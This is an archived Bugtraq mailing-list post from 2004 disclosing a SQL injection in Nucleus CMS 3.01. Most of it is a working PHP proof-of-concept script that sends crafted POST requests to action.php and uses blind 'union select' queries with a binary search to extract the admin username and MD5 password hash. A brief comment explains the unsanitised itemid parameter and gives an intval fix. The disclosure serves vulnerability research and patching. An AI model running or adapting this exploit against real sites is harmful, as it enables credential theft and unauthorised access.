NucleusCMS 3.01 SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NucleusCMS 3.01 SQL Injection Vulnerability
From: <acidbits@xxxxxxxxxxx>
Date: 25 Jul 2004 21:42:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


#!/usr/bin/php

<?


// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
// By aCiDBiTS           acidbits@xxxxxxxxxxx           24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin user 
placed at first position
// of members table. First of all checks if we can use "union select" or it 
isn't patched and then if first 
// member is admin.
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL


// Vulnerability description
// 
// In action.php, function addcoment, there's no user input sanization for 
parameter itemid. In line 65:
// $blogid = getBlogIDFromItemID($post['itemid']);
// This allows to inject SQL to get data form the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid'])); 



      
echo "+-------------------------------------------------------------------+\n| 
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n| By 
aCiDBiTS           acidbits@xxxxxxxxxxx           24-July-2004 
|\n+-------------------------------------------------------------------+\n\n";

if($argc<2)     die("Usage: ".$argv[0]." URL\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "Checking if vulnerable and \"union select\" works ... ";
if( test_cond("1") && !test_cond("0") )  echo "OK!\n";
else die( "It doesn't :-(\n\n" );

echo "Checking if first member of table is admin ... ";
if( test_cond("1") )  echo "OK!\n";
else die( "It's not :-(\n\n" );

echo "\nGetting username: ";
get_field("mname");
echo "\nGetting MD5(password): ";
get_field("mpassword");

die("\n\nDone!\n\n");


function get_field( $field )
{
        $unval= " 
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        $idx=1;
        $min=0;
        $max=strlen($unval);
        while($min!=$max) {
                $mid=$min+(($max-$min)/2);
                if( 
test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
                        $idx++; 
                        echo substr($unval,$mid,1);
                        $min=0;
                        $max=strlen($unval);
                        if( !test_cond("ord(substring($field,$idx,1))") ) 
return;
                } else {
                        if(  
test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) ) 
$max=$mid;
                        else $min=$mid;
                }
        }
        die( "\n\nUnexpected error!\n\n");
}


function test_cond( $cond )
{
        
$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencode($cond)."&body=a&user=a&userid=");
    if( eregi( "nucleus_ban", $res ) )
                return 0;
        else return 1;
}

function send_post($data)
{
        global $host;
        $ch=curl_init(); 
        curl_setopt ($ch, CURLOPT_URL, $host."action.php" );
        curl_setopt ($ch, CURLOPT_HEADER, 0);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt ($ch, CURLOPT_POST, 1);
        curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
        $data=curl_exec ($ch);
        curl_close ($ch);

        return $data;
}

?>

Prev by Date: QUESTION
Next by Date: Re: EasyWeb FileManager Directory Traversal
Previous by thread: Re: QUESTION
Next by thread: CVS woes: .cvspass
Index(es):
- Date
- Thread